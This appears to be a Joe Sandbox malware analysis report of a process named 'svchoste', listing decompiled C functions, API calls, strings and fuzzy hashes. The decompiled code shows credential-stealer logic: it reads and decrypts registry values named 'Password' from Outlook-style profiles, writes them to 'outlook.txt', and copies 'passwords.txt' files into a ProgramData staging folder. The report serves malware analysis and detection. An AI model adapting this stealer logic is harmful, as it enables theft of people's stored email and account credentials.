Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: lstrcat$_memset$CopyCurrentDirectoryFile__findfirst64i32__findnext64i32
String ID: C:\\ProgramData\\216363876181815$passwords.txt
API String ID: 844519491-900629367
Opcode ID: 421d16fb284120a80336410203528cf40a69d45bb65e34d1605ef073287e99d2
Instruction ID: e780089ac20f462a017eabc6b1cb05cebdd4caca1e2b18686385265a063e0f71
Opcode Fuzzy Hash: 421d16fb284120a80336410203528cf40a69d45bb65e34d1605ef073287e99d2
Instruction Fuzzy Hash: 802167B694020CABCB18DFA4DD8AEDD73B8AF59701F0449D8BA19571D0DF749A84CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B8DCA0, Relevance: 19.8, APIs: 13, Instructions: 286
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00B8DCBF
lstrcat.KERNEL32(?,02D066F0), ref: 00B8DCD3
CopyFileA.KERNEL32(?,?,00000001), ref: 00B8DCE6
_memset.LIBCMT ref: 00B8DCFA
wsprintfA.USER32 ref: 00B8DD18
DeleteFileA.KERNEL32(?), ref: 00B8E0C6

Part of subcall function 00B755AB: __fsopen.LIBCMT ref: 00B755B8

lstrcat.KERNEL32(?,02D06710), ref: 00B8DECF
lstrcat.KERNEL32(?,02D067F0), ref: 00B8DEEF
lstrcat.KERNEL32(?,02D06710), ref: 00B8DFA1
lstrcat.KERNEL32(?,02D067F0), ref: 00B8DFC0
lstrcat.KERNEL32(?,00B99CCC), ref: 00B8DFEA
_fprintf.LIBCMT ref: 00B8E06D
_fprintf.LIBCMT ref: 00B8E089

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memsetwsprintf
String ID:
API String ID: 3836584492-0
Opcode ID: 7f45657c3a42048f84b8f1e026252950360c12acfb282991f6cec008d2e0b58e
Instruction ID: 25add4f30c82a6b6e1ca0746f54e730d60e1032a7244f9ba21476000f99a767a
Opcode Fuzzy Hash: 7f45657c3a42048f84b8f1e026252950360c12acfb282991f6cec008d2e0b58e
Instruction Fuzzy Hash: 67C11CB1E042189FCB64DF68DC89BAEB7B5EB59301F0481D9E50DA7290DB359E84CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B84DA0, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 204
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00B84DA0(void* __ebx, signed int __edx, void* __edi, void* __esi, void* _a4, signed int* _a8, signed int _a12, intOrPtr* _a16, signed int* _a20) {
				int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				signed int _v24;
				intOrPtr _v52;
				intOrPtr _v60;
				signed int _v68;
				struct _BY_HANDLE_FILE_INFORMATION _v76;
				long _v80;
				void _v84;
				void _v88;
				void _v92;
				signed short _v96;
				signed short _v100;
				signed int _t89;
				int _t92;
				void* _t102;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t112;
				void* _t130;
				intOrPtr* _t145;
				intOrPtr _t146;
				intOrPtr _t147;
				intOrPtr _t167;
				intOrPtr _t168;
				void* _t177;
				void* _t178;
				signed int _t179;
				void* _t180;

				_t178 = __esi;
				_t177 = __edi;
				_t158 = __edx;
				_t130 = __ebx;
				_t89 =  *0xba01f4; // 0xac8b3e58
				_v24 = _t89 ^ _t179;
				_t92 = GetFileInformationByHandle(_a4,  &_v76); // executed
				_v8 = _t92;
				if(_v8 != 0) {
					_v16 = _v76.dwFileAttributes;
					_v12 = 0;
					if((_v16 & 0x00000001) != 0) {
						_v12 = _v12 | 0x00000001;
					}
					if((_v16 & 0x00000002) != 0) {
						_v12 = _v12 | 0x00000002;
					}
					if((_v16 & 0x00000004) != 0) {
						_v12 = _v12 | 0x00000004;
					}
					if((_v16 & 0x00000010) != 0) {
						_v12 = _v12 | 0x00000010;
					}
					if((_v16 & 0x00000020) != 0) {
						_v12 = _v12 | 0x00000020;
					}
					if((_v16 & 0x00000010) == 0) {
						_v12 = _v12 | 0x80000000;
					} else {
						_v12 = _v12 | 0x40000000;
					}
					_v12 = _v12 | 0x01000000;
					_t158 = _v16 & 0x00000001;
					if((_v16 & 0x00000001) == 0) {
						_v12 = _v12 | 0x00800000;
					}
					_v80 = GetFileSize(_a4, 0);
					if(_v80 > 0x28) {
						SetFilePointer(_a4, 0, 0, 0); // executed
						ReadFile(_a4,  &_v84, 2,  &_v20, 0); // executed
						SetFilePointer(_a4, 0x24, 0, 0); // executed
						_t158 =  &_v88;
						ReadFile(_a4,  &_v88, 4,  &_v20, 0); // executed
						if((_v84 & 0x0000ffff) == 0x54ad) {
							_t158 = _v88 + 0x34;
							if(_v80 > _v88 + 0x34) {
								SetFilePointer(_a4, _v88, 0, 0);
								_t158 =  &_v20;
								ReadFile(_a4,  &_v92, 4,  &_v20, 0);
								if(_v92 == 0x5a4d || _v92 == 0x454e || _v92 == 0x454c || _v92 == 0x4550) {
									_t158 = _v12 | 0x00400000;
									_v12 = _v12 | 0x00400000;
								}
							}
						}
					}
					if(_a8 != 0) {
						 *_a8 = _v12;
					}
					if(_a12 != 0) {
						_t158 = _a12;
						 *_a12 = _v80;
					}
					if(_a16 != 0) {
						_t167 = _v76.ftLastAccessTime;
						_t108 = E00B82F70(_t167, _v60);
						_t145 = _a16;
						 *_t145 = _t108;
						 *((intOrPtr*)(_t145 + 4)) = _t167;
						_t168 = _v52;
						_t110 = E00B82F70(_v76.ftLastWriteTime, _t168);
						_t146 = _a16;
						 *((intOrPtr*)(_t146 + 8)) = _t110;
						 *((intOrPtr*)(_t146 + 0xc)) = _t168;
						_t158 = _v68;
						_t112 = E00B82F70(_v76.ftCreationTime, _t158);
						_t180 = _t180 + 0x18;
						_t147 = _a16;
						 *((intOrPtr*)(_t147 + 0x10)) = _t112;
						 *(_t147 + 0x14) = _t158;
					}
					if(_a20 != 0) {
						E00B82EB0(_v76.ftLastWriteTime, _v52,  &_v100,  &_v96);
						_t158 = _a20;
						 *_a20 = _v96 & 0x0000ffff | (_v100 & 0x0000ffff) << 0x00000010;
					}
					_t102 = 0;
					goto L35;
				} else {
					_t102 = 0x200;
					L35:
					return E00B74354(_t102, _t130, _v24 ^ _t179, _t158, _t177, _t178);
				}
			}

0x00b84da0
0x00b84da0
0x00b84da0
0x00b84da0
0x00b84da6
0x00b84dad
0x00b84db8
0x00b84dbe
0x00b84dc5
0x00b84dd4
0x00b84dd7
0x00b84de4
0x00b84dec
0x00b84dec
0x00b84df5
0x00b84dfd
0x00b84dfd
0x00b84e06
0x00b84e0e
0x00b84e0e
0x00b84e17
0x00b84e1f
0x00b84e1f
0x00b84e28
0x00b84e30
0x00b84e30
0x00b84e39
0x00b84e51
0x00b84e3b
0x00b84e44
0x00b84e44
0x00b84e5d
0x00b84e63
0x00b84e66
0x00b84e72
0x00b84e72
0x00b84e81
0x00b84e88
0x00b84e98
0x00b84eae
0x00b84ebe
0x00b84ecc
0x00b84ed4
0x00b84ee4
0x00b84ee9
0x00b84eef
0x00b84efd
0x00b84f05
0x00b84f13
0x00b84f20
0x00b84f40
0x00b84f46
0x00b84f46
0x00b84f20
0x00b84eef
0x00b84ee4
0x00b84f4d
0x00b84f55
0x00b84f55
0x00b84f5b
0x00b84f5d
0x00b84f63
0x00b84f63
0x00b84f69
0x00b84f6f
0x00b84f73
0x00b84f7b
0x00b84f7e
0x00b84f80
0x00b84f83
0x00b84f8b
0x00b84f93
0x00b84f96
0x00b84f99
0x00b84f9c
0x00b84fa4
0x00b84fa9
0x00b84fac
0x00b84faf
0x00b84fb2
0x00b84fb2
0x00b84fb9
0x00b84fcb
0x00b84fe0
0x00b84fe3
0x00b84fe3
0x00b84fe5
0x00000000
0x00b84dc7
0x00b84dc7
0x00b84fe7
0x00b84ff4
0x00b84ff4

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 00B84DB8
GetFileSize.KERNEL32(00000000,00000000), ref: 00B84E7B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B84E98
ReadFile.KERNEL32(00000000,?,00000002,?,00000000), ref: 00B84EAE
SetFilePointer.KERNEL32(00000000,00000024,00000000,00000000), ref: 00B84EBE
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 00B84ED4
SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 00B84EFD

Strings

PE, xrefs: 00B84F34
(, xrefs: 00B84E84

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: File$Pointer$Read$HandleInformationSize
String ID: ($PE
API String ID: 4143101051-3347799738
Opcode ID: 8f142a5d83b329c3ead7f10f08985b776dacab971d14fa7b3056be044308a916
Instruction ID: 4060008b3ea6b2eeff745fc25e2e0771d85bf8c460cd4a9b70cb364b1d91e481
Opcode Fuzzy Hash: 8f142a5d83b329c3ead7f10f08985b776dacab971d14fa7b3056be044308a916
Instruction Fuzzy Hash: D8812A71E10208EFDB18DFD4D895BAEBBF5FF48305F108499E605AB294D730AA81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B340, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 71
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00B8B340(void* __ebx, void* __edi, void* __esi) {
				_Unknown_base(*)()* _v8;
				signed int _v12;
				char _v276;
				unsigned int _v280;
				intOrPtr _v336;
				intOrPtr _v340;
				char _v348;
				struct _MEMORYSTATUS _v380;
				signed int _t29;
				CHAR* _t31;
				struct _MEMORYSTATUSEX* _t40;
				void* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t54;
				void* _t55;
				signed int _t56;
				void* _t57;

				_t55 = __esi;
				_t54 = __edi;
				_t42 = __ebx;
				_t29 =  *0xba01f4; // 0xac8b3e58
				_v12 = _t29 ^ _t56;
				_t31 =  *0xba20dc; // 0x2d077e0
				_t43 =  *0xba243c; // 0x2d06c58
				_v8 = GetProcAddress(LoadLibraryA(_t43), _t31);
				if(_v8 != 0) {
					E00B791C0( &_v348, 0, 0x40);
					_t57 = _t57 + 0xc;
					_v348 = 0x40;
					_t40 =  &_v348;
					GlobalMemoryStatusEx(_t40);
					if(_t40 != 1) {
						_v8 = 0;
					} else {
						_v280 = E00B7E2D0(_v340, _v336, 0x100000, 0);
					}
				}
				if(_v8 == 0) {
					_v380.dwLength = 0;
					_v380.dwMemoryLoad = 0;
					_v380.dwTotalPhys = 0;
					_v380.dwAvailPhys = 0;
					_v380.dwTotalPageFile = 0;
					_v380.dwAvailPageFile = 0;
					_v380.dwTotalVirtual = 0;
					_v380.dwAvailVirtual = 0;
					_v380.dwLength = 0x20;
					GlobalMemoryStatus( &_v380);
					_v280 = _v380.dwTotalPhys >> 0x14;
				}
				_t44 =  *0xba21d4; // 0x2d067e0
				wsprintfA( &_v276, _t44, _v280);
				return E00B74354( &_v276, _t42, _v12 ^ _t56,  &_v276, _t54, _t55);
			}

0x00b8b340
0x00b8b340
0x00b8b340
0x00b8b349
0x00b8b350
0x00b8b353
0x00b8b359
0x00b8b36d
0x00b8b374
0x00b8b381
0x00b8b386
0x00b8b389
0x00b8b393
0x00b8b39a
0x00b8b3a0
0x00b8b3c4
0x00b8b3a2
0x00b8b3bc
0x00b8b3bc
0x00b8b3a0
0x00b8b3cf
0x00b8b3d3
0x00b8b3d9
0x00b8b3df
0x00b8b3e5
0x00b8b3eb
0x00b8b3f1
0x00b8b3f7
0x00b8b3fd
0x00b8b403
0x00b8b414
0x00b8b423
0x00b8b423
0x00b8b430
0x00b8b43e
0x00b8b45a

APIs

LoadLibraryA.KERNEL32(02D06C58,02D077E0), ref: 00B8B360
GetProcAddress.KERNEL32(00000000), ref: 00B8B367
_memset.LIBCMT ref: 00B8B381
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00B8B39A
__aulldiv.LIBCMT ref: 00B8B3B7
GlobalMemoryStatus.KERNEL32 ref: 00B8B414
wsprintfA.USER32 ref: 00B8B43E

Strings

@, xrefs: 00B8B389
, xrefs: 00B8B403

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: GlobalMemoryStatus$AddressLibraryLoadProc__aulldiv_memsetwsprintf
String ID: $@
API String ID: 2652395207-1077428164
Opcode ID: 1751f0dfb97bd29b3b0eecc964e6c669e46f8482079e997b8d648ea9efb2b76b
Instruction ID: a0e221070e5cdad1d2cacc2711b10252b0d39511f0ee2958c7aa6756431cc5e7
Opcode Fuzzy Hash: 1751f0dfb97bd29b3b0eecc964e6c669e46f8482079e997b8d648ea9efb2b76b
Instruction Fuzzy Hash: BB31B1B0D04218EFCB64DFA8DD8ABD9B7F8AB48300F5045E9E60DA7250EB745A84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B94E20, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
stringCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00B94E20(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				char _v540;
				signed int _t17;
				intOrPtr _t26;
				void* _t32;
				signed int _t49;
				void* _t55;

				_t55 = __eflags;
				_t17 =  *0xba01f4; // 0xac8b3e58
				_v8 = _t17 ^ _t49;
				E00B791C0( &_v276, 0, 0x104);
				E00B8A380( &_v276, 0x1a); // executed
				 *0xba28c4( &_v276, _a8);
				E00B791C0( &_v540, 0, 0x104);
				 *0xba28c4( &_v540, "C:\\ProgramData\\216363876181815");
				_t26 =  *0xba20c4; // 0x2d07ef8
				 *0xba28c4( &_v540, _t26);
				 *0xba28c4(_a4);
				CreateDirectoryA( &_v540, 0); // executed
				_t32 = E00B94D00(__ebx,  &_v276, __edi, __esi, _t55, 0xb994ed,  &_v276, _a12, _a8, _a4); // executed
				return E00B74354(_t32, __ebx, _v8 ^ _t49,  &_v276, __edi, __esi,  &_v540);
			}

0x00b94e20
0x00b94e29
0x00b94e30
0x00b94e41
0x00b94e52
0x00b94e65
0x00b94e79
0x00b94e8d
0x00b94e93
0x00b94ea0
0x00b94eb1
0x00b94ec0
0x00b94ede
0x00b94ef3

APIs

_memset.LIBCMT ref: 00B94E41

Part of subcall function 00B8A380: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00B8A39D

lstrcat.KERNEL32(?,02D07DF0), ref: 00B94E65
_memset.LIBCMT ref: 00B94E79
lstrcat.KERNEL32(?,C:\\ProgramData\\216363876181815), ref: 00B94E8D
lstrcat.KERNEL32(?,02D07EF8), ref: 00B94EA0
lstrcat.KERNEL32(?,02D07DF0), ref: 00B94EB1
CreateDirectoryA.KERNEL32(?,00000000), ref: 00B94EC0

Part of subcall function 00B94D00: SetCurrentDirectoryA.KERNEL32(00B94F3F), ref: 00B94D17
Part of subcall function 00B94D00: __findfirst64i32.LIBCMT ref: 00B94D26
Part of subcall function 00B94D00: _memset.LIBCMT ref: 00B94D49
Part of subcall function 00B94D00: _memset.LIBCMT ref: 00B94D5F
Part of subcall function 00B94D00: lstrcat.KERNEL32(?,00B94F3F), ref: 00B94D72
Part of subcall function 00B94D00: lstrcat.KERNEL32(?,passwords.txt), ref: 00B94D84
Part of subcall function 00B94D00: lstrcat.KERNEL32(?,C:\\ProgramData\\216363876181815), ref: 00B94D96
Part of subcall function 00B94D00: lstrcat.KERNEL32(?,02D07EF8), ref: 00B94DAA
Part of subcall function 00B94D00: lstrcat.KERNEL32(?,00B94EE3), ref: 00B94DBB
Part of subcall function 00B94D00: lstrcat.KERNEL32(?,passwords.txt), ref: 00B94DCD
Part of subcall function 00B94D00: CopyFileA.KERNEL32(?,?,00000001), ref: 00B94DE3
Part of subcall function 00B94D00: __findnext64i32.LIBCMT ref: 00B94DF2

Strings

C:\\ProgramData\\216363876181815, xrefs: 00B94E81

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: lstrcat$_memset$Directory$CopyCreateCurrentFileFolderPath__findfirst64i32__findnext64i32
String ID: C:\\ProgramData\\216363876181815
API String ID: 1500432195-420526346
Opcode ID: 66fc7dd3fd83ddd3ebb70ad804291e0935c898d233744bead1bdedc04dfa29c5
Instruction ID: 1042ba96947c7624063df2102fb4b0e6cd1b44d353efdf2bc43e6ed92c68d310
Opcode Fuzzy Hash: 66fc7dd3fd83ddd3ebb70ad804291e0935c898d233744bead1bdedc04dfa29c5
Instruction Fuzzy Hash: AC21A5B694020CABCB14EFA4DC86FDA73B8AF19700F0445D8BA19572D0DF749A84CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B8EF60, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00B8EF60(void* __ebx, long* __ecx, void* __edi, void* __esi, intOrPtr _a4, void* _a8, char* _a12) {
				long _v8;
				char _v16;
				void* _v20;
				char _v36;
				signed int _v40;
				char _v1064;
				int _v1068;
				char _v2096;
				int _v2100;
				char _v3128;
				int _v3132;
				int _v3136;
				char _v3144;
				int _v3148;
				char _v3176;
				char _v3204;
				char _v3208;
				signed int _v3212;
				long* _v3216;
				signed int _t78;
				signed int _t79;
				long _t83;
				intOrPtr _t87;
				void* _t106;
				void* _t118;
				void* _t160;
				void* _t161;
				signed int _t162;
				void* _t163;
				void* _t164;
				void* _t165;

				_t161 = __esi;
				_t160 = __edi;
				_t118 = __ebx;
				_push(0xffffffff);
				_push(E00B9662F);
				_push( *[fs:0x0]);
				_t164 = _t163 - 0xc80;
				_t78 =  *0xba01f4; // 0xac8b3e58
				_t79 = _t78 ^ _t162;
				_v40 = _t79;
				_push(_t79);
				 *[fs:0x0] =  &_v16;
				_v3216 = __ecx;
				_v3212 = 0;
				E00B72DD0( &_v36);
				_v8 = 0;
				 *_v3216 = 0;
				_v20 = 0;
				_t149 = _a12;
				_t83 = RegOpenKeyExA(0x80000001, _a12, 0, 0x20019,  &_a8); // executed
				if(_t83 != 0) {
					E00B72E00(_a4,  &_v36);
					_v3212 = _v3212 | 0x00000001;
					_v8 = 0xffffffff;
					E00B72E80( &_v36);
					_t87 = _a4;
					goto L15;
				} else {
					_v3136 = 0;
					_v3132 = 0xff;
					_v1068 = 3;
					_v2096 = 0;
					while(RegEnumValueA(_a8, _v3136,  &_v2096,  &_v3132, 0,  &_v1068,  &_v1064,  &_v2100) == 0) {
						E00B72D70( &_v3208);
						_v8 = 1;
						E00B71EA0( &_v3204,  &_v2096);
						_v3208 = _v1068;
						_v3148 = _v2100;
						if(_v1068 != 3) {
							if(_v1068 != 1) {
								if(_v1068 == 4) {
									_v3144 = _v1064;
								}
							} else {
								E00B71EA0( &_v3176,  &_v1064);
							}
						} else {
							_t106 = E00B72D10( &_v2096, "Password");
							_t165 = _t164 + 8;
							if(_t106 == 0) {
								E00B738E0( &_v1064,  &_v1064, "%S",  &_v1064);
								_t164 = _t165 + 0xc;
								E00B71EA0( &_v3176,  &_v1064);
							} else {
								_v20 = E00B8EED0( &_v1064, _v2100);
								E00B738C0( &_v3128, _v20);
								HeapFree(GetProcessHeap(), 0, _v20);
								E00B71EA0( &_v3176,  &_v3128);
								E00B738C0( &_v3128, 0xb99491);
								_t164 = _t165 + 0x18;
							}
						}
						 *_v3216 =  *_v3216 + 1;
						E00B72EC0( &_v36,  &_v3208);
						_v3132 = 0x400;
						_v2100 = 0x400;
						_v3136 = _v3136 + 1;
						_v8 = 0;
						E00B72DA0( &_v3208);
					}
					E00B72E00(_a4,  &_v36);
					_t149 = _v3212 | 0x00000001;
					_v3212 = _v3212 | 0x00000001;
					_v8 = 0xffffffff;
					E00B72E80( &_v36);
					_t87 = _a4;
					L15:
					 *[fs:0x0] = _v16;
					return E00B74354(_t87, _t118, _v40 ^ _t162, _t149, _t160, _t161);
				}
			}

0x00b8ef60
0x00b8ef60
0x00b8ef60
0x00b8ef63
0x00b8ef65
0x00b8ef70
0x00b8ef71
0x00b8ef77
0x00b8ef7c
0x00b8ef7e
0x00b8ef81
0x00b8ef85
0x00b8ef8b
0x00b8ef91
0x00b8ef9e
0x00b8efa3
0x00b8efb0
0x00b8efb6
0x00b8efc8
0x00b8efd1
0x00b8efd9
0x00b8f1f7
0x00b8f205
0x00b8f20b
0x00b8f215
0x00b8f21a
0x00000000
0x00b8efdf
0x00b8efdf
0x00b8efe9
0x00b8eff3
0x00b8effd
0x00b8f004
0x00b8f048
0x00b8f04d
0x00b8f05e
0x00b8f069
0x00b8f075
0x00b8f082
0x00b8f13d
0x00b8f15a
0x00b8f162
0x00b8f162
0x00b8f13f
0x00b8f14c
0x00b8f14c
0x00b8f088
0x00b8f094
0x00b8f099
0x00b8f09e
0x00b8f11a
0x00b8f11f
0x00b8f12f
0x00b8f0a0
0x00b8f0b6
0x00b8f0c4
0x00b8f0d9
0x00b8f0ec
0x00b8f0fd
0x00b8f102
0x00b8f102
0x00b8f134
0x00b8f179
0x00b8f185
0x00b8f18a
0x00b8f194
0x00b8f1a7
0x00b8f1ad
0x00b8f1b7
0x00b8f1b7
0x00b8f1c8
0x00b8f1d3
0x00b8f1d6
0x00b8f1dc
0x00b8f1e6
0x00b8f1eb
0x00b8f21d
0x00b8f220
0x00b8f235
0x00b8f235

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00B8EFD1
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B8F034
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B8F0D2
HeapFree.KERNEL32(00000000), ref: 00B8F0D9

Part of subcall function 00B738E0: _vswprintf_s.LIBCMT ref: 00B738FB

task.LIBCPMTD ref: 00B8F1E6
task.LIBCPMTD ref: 00B8F215

Strings

Password, xrefs: 00B8F088

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: Heaptask$EnumFreeOpenProcessValue_vswprintf_s
String ID: Password
API String ID: 541219633-3434357891
Opcode ID: 18e12cb0c15c3b8ec559f6bc6d8071275931962d2b769ba920ecce3eb1b77706
Instruction ID: 3458e19aa5e5d32e46c12e655be4df2289873e23409a3c04ecf78c7e2e97080f
Opcode Fuzzy Hash: 18e12cb0c15c3b8ec559f6bc6d8071275931962d2b769ba920ecce3eb1b77706
Instruction Fuzzy Hash: A471E7B19102189BDB24EB64CC91FEEB7F4EB48300F5082E9E51967291DF346B88CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00B8F240, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00B8F240(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v32;
				intOrPtr _v36;
				void* __ebp;
				intOrPtr _t26;
				void* _t61;
				void* _t62;

				_t60 = __esi;
				_t59 = __edi;
				_t42 = __ebx;
				E00B8EF60(__ebx,  &_v32, __edi, __esi,  &_v28, 0x80000001, _a4); // executed
				_t26 = E00B755AB("outlook.txt", "a+"); // executed
				_t62 = _t61 + 8;
				_v12 = _t26;
				_v8 = _v32;
				_t65 = _v8;
				if(_v8 > 0) {
					_push("\n");
					_push(_v12);
					E00B755C2(__ebx, __edi, __esi, _t65);
					_t62 = _t62 + 8;
					_v36 = 0;
					while(1) {
						_t66 = _v36 - _v8;
						if(_v36 >= _v8) {
							goto L7;
						}
						_push(E00B71330(E00B72EA0( &_v28, _v36) + 4));
						_push("%s: ");
						_push(_v12);
						E00B755C2(_t42, _t59, _t60, _t66);
						_t62 = _t62 + 0xc;
						if( *((intOrPtr*)(E00B72EA0( &_v28, _v36))) != 4) {
							_push(E00B71330(E00B72EA0( &_v28, _v36) + 0x20));
							_push("%s\n");
							_push(_v12);
							E00B755C2(_t42, _t59, _t60, E00B72EA0( &_v28, _v36) + 0x20);
							_t62 = _t62 + 0xc;
						}
						_v36 = _v36 + 1;
					}
				}
				L7:
				_push(_v12);
				E00B75EA3(_t42, _v12, _t59, _t60, __eflags);
				return E00B72E80( &_v28);
			}

0x00b8f240
0x00b8f240
0x00b8f240
0x00b8f256
0x00b8f265
0x00b8f26a
0x00b8f26d
0x00b8f273
0x00b8f276
0x00b8f27a
0x00b8f280
0x00b8f288
0x00b8f289
0x00b8f28e
0x00b8f291
0x00b8f2a3
0x00b8f2a6
0x00b8f2a9
0x00000000
0x00000000
0x00b8f2c1
0x00b8f2c2
0x00b8f2ca
0x00b8f2cb
0x00b8f2d0
0x00b8f2e2
0x00b8f2fa
0x00b8f2fb
0x00b8f303
0x00b8f304
0x00b8f309
0x00b8f309
0x00b8f2a0
0x00b8f2a0
0x00b8f2a3
0x00b8f30e
0x00b8f311
0x00b8f312
0x00b8f325

APIs

Part of subcall function 00B8EF60: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00B8EFD1
Part of subcall function 00B8EF60: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B8F034
Part of subcall function 00B8EF60: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B8F0D2
Part of subcall function 00B8EF60: HeapFree.KERNEL32(00000000), ref: 00B8F0D9

Part of subcall function 00B755AB: __fsopen.LIBCMT ref: 00B755B8

_fprintf.LIBCMT ref: 00B8F289
_fprintf.LIBCMT ref: 00B8F2CB

Part of subcall function 00B755C2: __lock_file.LIBCMT ref: 00B75609
Part of subcall function 00B755C2: __stbuf.LIBCMT ref: 00B7568D
Part of subcall function 00B755C2: __output_l.LIBCMT ref: 00B7569D
Part of subcall function 00B755C2: __ftbuf.LIBCMT ref: 00B756A7

_fprintf.LIBCMT ref: 00B8F304
task.LIBCPMTD ref: 00B8F31D

Strings

%s: , xrefs: 00B8F2C2
%s, xrefs: 00B8F2FB
outlook.txt, xrefs: 00B8F260

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: _fprintf$Heap$EnumFreeOpenProcessValue__fsopen__ftbuf__lock_file__output_l__stbuftask
String ID: %s$%s: $outlook.txt
API String ID: 1568629617-832069077
Opcode ID: a597c7e243b28739281722afaf967faa8650fc8d76218d83b4e68461b5319c08
